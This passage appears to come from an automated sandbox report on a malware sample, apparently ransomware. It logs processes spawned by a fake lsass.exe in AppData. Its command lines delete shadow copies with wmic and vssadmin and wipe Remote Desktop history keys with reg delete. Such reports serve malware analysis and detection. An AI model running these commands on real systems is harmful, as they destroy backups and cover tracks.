| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:24 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 118763 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17360229959 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 80041014 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #18: wmic.exe
168
0
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\syswow64\wbem\wmic.exe |
| Command Line | wmic shadowcopy delete |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:53, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x35c |
| Parent PID | 0x41c (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
598
0x
59C
0x
6E4
0x
5C8
0x
5C4
0x
81C
|
Host Behavior
COM (7)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WBEMLocator | IWbemLocator | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | F6D90F12-9C73-11D3-B32E-00C04F990BB4 | 2933BF95-7B36-11D2-B20E-00C04F983E60 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | EB87E1BD-3233-11D2-AEC9-00C04FB68820 | EB87E1BC-3233-11D2-AEC9-00C04FB68820 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = root\cli |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = root\cli\ms_409 |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\XDUWTFONO\ROOT\CIMV2 |
|
1 | |
| Execute | WBEMLocator | IWbemServices | method_name = ExecQuery, query_language = WQL, query = SELECT * FROM Win32_ShadowCopy |
|
1 |
Registry (5)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging, data = 48 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging Directory |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Logging Directory, data = 37 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM | value_name = Log File Max Size, data = 54 |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\system32\kernel32.dll | base_address = 0x76c20000 |
|
1 | |
| Get Handle | c:\windows\syswow64\wbem\wmic.exe | base_address = 0xc80000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = XDUWTFONO |
|
1 | |
| Get Time | type = System Time, time = 2019-07-04 15:37:25 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 119106 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17414977186 |
|
1 | |
| Get Time | type = Local Time, time = 2019-07-05 01:37:25 (Local Time) |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Process #19: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:54, Reason: RPC Server |
| Unmonitor | End Time: 00:04:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:31 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x36c |
| Parent PID | 0x1cc (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
7A0
0x
7C4
0x
7F8
0x
430
0x
268
0x
768
0x
764
0x
760
0x
75C
0x
70C
0x
6E8
0x
6D8
0x
6D4
0x
6C8
0x
6C0
0x
6B8
0x
6A4
0x
6A0
0x
690
0x
67C
0x
490
0x
454
0x
450
0x
428
0x
424
0x
420
0x
404
0x
18C
0x
F0
0x
C8
0x
3F0
0x
3E4
0x
398
0x
394
0x
390
0x
38C
0x
378
0x
370
0x
4A4
0x
824
0x
814
0x
838
0x
414
0x
834
0x
83C
0x
888
0x
88C
0x
714
0x
288
0x
2B0
0x
664
0x
604
0x
B14
0x
B00
|
Process #21: wmiprvse.exe
0
0
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\windows\syswow64\wbem\wmiprvse.exe |
| Command Line | C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:56, Reason: RPC Server |
| Unmonitor | End Time: 00:04:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:29 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x830 |
| Parent PID | 0x254 (c:\windows\system32\svchost.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
82C
0x
858
0x
860
0x
864
0x
85C
0x
854
0x
850
0x
6EC
0x
8E8
0x
59C
|
Process #22: vssvc.exe
3
0
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\system32\vssvc.exe |
| Command Line | C:\Windows\system32\vssvc.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:57, Reason: RPC Server |
| Unmonitor | End Time: 00:01:10, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x84c |
| Parent PID | 0x1cc (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
2A8
0x
73C
0x
840
0x
844
0x
848
0x
884
0x
694
0x
898
0x
8EC
|
Host Behavior
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:26 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 120417 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17769298451 |
|
1 |
Process #23: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:57, Reason: Child Process |
| Unmonitor | End Time: 00:00:58, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8b4 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
518
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\vssadmin.exe | os_pid = 0x5b0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4aa60000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:26 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 120682 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17795348982 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000002 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #24: vssadmin.exe
0
0
| Information | Value |
|---|---|
| ID | #24 |
| File Name | c:\windows\syswow64\vssadmin.exe |
| Command Line | vssadmin delete shadows /all /quiet |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:57, Reason: Child Process |
| Unmonitor | End Time: 00:00:58, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5b0 |
| Parent PID | 0x8b4 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
594
0x
6BC
0x
244
0x
2AC
0x
314
|
Process #25: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #25 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:57, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x274 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
794
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0x7a4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4acf0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:26 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 120931 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17833049795 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #26: reg.exe
42
0
| Information | Value |
|---|---|
| ID | #26 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7a4 |
| Parent PID | 0x274 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
410
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
6 | |
| Write | STD_ERROR_HANDLE | size = 7 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 67 |
|
1 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x630000 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 121041 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17843368216 |
|
1 |
Process #27: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #27 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3c0 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
32C
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0x828, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4ac60000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
